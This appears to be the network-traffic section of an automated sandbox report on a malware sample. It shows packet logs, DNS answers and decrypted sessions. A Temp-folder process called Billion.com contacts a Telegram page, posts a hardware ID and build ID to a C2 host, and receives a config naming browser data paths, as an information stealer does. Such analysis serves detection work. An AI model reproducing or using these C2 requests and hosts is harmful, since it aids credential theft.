                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993930101 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993942022 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993954897 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993969917 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993983030 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993993998 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.994007111 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.994204998 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.994225025 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.994296074 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.994311094 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.994323015 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.994334936 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.994347095 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.994364977 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.996160984 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.996175051 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.996186018 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.996330976 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.996350050 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.996362925 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.996375084 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.996526003 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.996539116 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.996593952 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.997068882 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.999228001 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.999353886 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.999588013 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.111016989 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.211855888 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.213314056 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.214279890 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.214479923 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.334326029 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.425786972 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.441932917 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.442080975 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.442094088 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.442107916 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.442118883 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.442132950 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.442137003 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.444987059 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.462836027 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.777437925 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.785826921 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.058784008 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.058794975 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.058876991 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.058928013 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.058942080 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.059242010 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.059252977 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.059266090 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.059386969 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.059397936 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.059407949 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.059417963 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.059428930 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.059779882 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.085542917 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.086199045 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.403134108 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.442152023 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.452303886 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.452346087 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.452405930 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.452423096 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.452429056 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.452553034 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.452562094 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.452811956 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.488949060 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.794003963 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.455151081 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.456023932 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.456818104 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.457129955 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.770536900 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.771841049 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.771856070 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.771866083 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.772149086 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.772782087 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.773215055 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.773753881 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:56.885920048 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.213182926 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.235335112 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.235351086 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.235394955 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.291671991 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.549599886 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.567508936 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.630157948 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.726463079 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.729104996 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.882142067 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.882661104 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.890139103 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.890165091 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.890290022 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.890785933 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.890852928 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.911376953 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.225668907 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.233659983 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.233721018 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.233730078 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.234308004 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.245944977 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.637237072 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.646023989 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.646042109 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.646157980 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.646469116 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.657291889 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.971491098 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.977577925 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.977611065 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.977735043 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.977880955 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.984827995 CET54108443192.168.2.623.209.72.39
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Dec 24, 2024 19:28:21.923336983 CET | 192.168.2.6 | 1.1.1.1 | c255 | (Port unreachable) | Destination Unreachable
Dec 24, 2024 19:28:24.814146996 CET | 192.168.2.6 | 1.1.1.1 | c24c | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:22.168806076 CET1.1.1.1192.168.2.60x1dbNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:22.168806076 CET1.1.1.1192.168.2.60x1dbNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:22.256850004 CET1.1.1.1192.168.2.60x5a4cNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.092684031 CET1.1.1.1192.168.2.60x145No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.201147079 CET1.1.1.1192.168.2.60x837eNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.624630928 CET1.1.1.1192.168.2.60x49c0No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.624630928 CET1.1.1.1192.168.2.60x49c0No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.814085960 CET1.1.1.1192.168.2.60x597fNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.157049894 CET1.1.1.1192.168.2.60xc358No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.157049894 CET1.1.1.1192.168.2.60xc358No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.157109976 CET1.1.1.1192.168.2.60x525cNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.160084009 CET1.1.1.1192.168.2.60x9251No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.160084009 CET1.1.1.1192.168.2.60x9251No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.160903931 CET1.1.1.1192.168.2.60x2fdcNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.171585083 CET1.1.1.1192.168.2.60x7ac2No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.171585083 CET1.1.1.1192.168.2.60x7ac2No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.171863079 CET1.1.1.1192.168.2.60x6592No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.760910988 CET1.1.1.1192.168.2.60x8fa7No error (0)sb.scorecardresearch.com18.161.69.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.760910988 CET1.1.1.1192.168.2.60x8fa7No error (0)sb.scorecardresearch.com18.161.69.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.760910988 CET1.1.1.1192.168.2.60x8fa7No error (0)sb.scorecardresearch.com18.161.69.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.760910988 CET1.1.1.1192.168.2.60x8fa7No error (0)sb.scorecardresearch.com18.161.69.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.772022963 CET1.1.1.1192.168.2.60xa257No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.772808075 CET1.1.1.1192.168.2.60x507fNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.902776003 CET1.1.1.1192.168.2.60x10acNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.902831078 CET1.1.1.1192.168.2.60x8564No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:27.045588017 CET1.1.1.1192.168.2.60xc5c2No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:27.048626900 CET1.1.1.1192.168.2.60xffb0No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false

Session ID | Source IP | Source Port | Destination IP | Destination Port
0 | 192.168.2.6 | 49715 | 20.198.119.84 | 443

Session ID | Source IP | Source Port | Destination IP | Destination Port
1 | 192.168.2.6 | 49731 | 20.198.119.84 | 443

Session ID | Source IP | Source Port | Destination IP | Destination Port
2 | 192.168.2.6 | 49780 | 20.198.119.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:27:33 UTC | 71 | OUT | Data Ascii:
CNT 1 CON 305
MS-CV: s9tRNlMTV0OMbKgl.1
Context: 1fea5c6cac9aeb98

2024-12-24 18:27:33 UTC | 249 | OUT | Data Ascii:
<connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-24 18:27:33 UTC | 1084 | OUT | Data Ascii:
ATH 2 CON\DEVICE 1061
MS-CV: s9tRNlMTV0OMbKgl.2
Context: 1fea5c6cac9aeb98

<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAf3cLYZtWUCJqAc2SXUhfpjZ3f6eSFKdlmhd31um7/s3GQY4y3bJj4qzBr94niuQ9KKaRDJavxvn7uQe6CrSt1vFQmMBmYHbGhV8KqJ5ZdMyrp
2024-12-24 18:27:33 UTC | 218 | OUT | Data Ascii:
BND 3 CON\WNS 0 197
MS-CV: s9tRNlMTV0OMbKgl.3
Context: 1fea5c6cac9aeb98

<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-24 18:27:34 UTC | 14 | IN | Data Ascii:
202 1 CON 58
2024-12-24 18:27:34 UTC | 58 | IN | Data Ascii:
MS-CV: rR3K3Vp1o0mdID4sDAU23w.0

Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49792 | 149.154.167.99 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:27:39 UTC | 85 | OUT | GET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: t.me
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
2024-12-24 18:27:39 UTC | 511 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:39 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                        Content-Length: 12299
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Set-Cookie: stel_ssid=8910be78ceb6a609bb_9198664535209794300; expires=Wed, 25 Dec 2024 18:27:39 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                        Cache-control: no-store
                                                                                                                                                                                                                                                                                                        X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=35768000
2024-12-24 18:27:39 UTC | 12299 | IN | Data Ascii:
<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Telegram: Contact @k04ael</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49800 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:27:41 UTC | 231 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
2024-12-24 18:27:42 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:42 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
2024-12-24 18:27:42 UTC | 5 | IN | Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49806 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:27:43 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----3E3OP8QIMOZUAIMOHVS2
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 256
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
2024-12-24 18:27:43 UTC | 256 | OUT | Data Ascii:
------3E3OP8QIMOZUAIMOHVS2
Content-Disposition: form-data; name="hwid"

595CFF2C85933158821099-a33c7340-61ca
------3E3OP8QIMOZUAIMOHVS2
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------3E3OP8QIMOZUAIMOHVS2--
2024-12-24 18:27:44 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:44 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
2024-12-24 18:27:44 UTC | 69 | IN | Data Ascii:
3a
1|1|1|1|259654c3bcc7330e1954cafd3454ec44|1|1|1|1|0|50000|1
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49812 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:27:46 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----26XT0RQ16P8QIECB1DTJ
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
2024-12-24 18:27:46 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                                        Data Ascii: ------26XT0RQ16P8QIECB1DTJContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------26XT0RQ16P8QIECB1DTJContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------26XT0RQ16P8QIECB1DTJCont
2024-12-24 18:27:47 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:46 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
2024-12-24 18:27:47 UTC | 2192 | IN
                                                                                                                                                                                                                                                                                                        Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
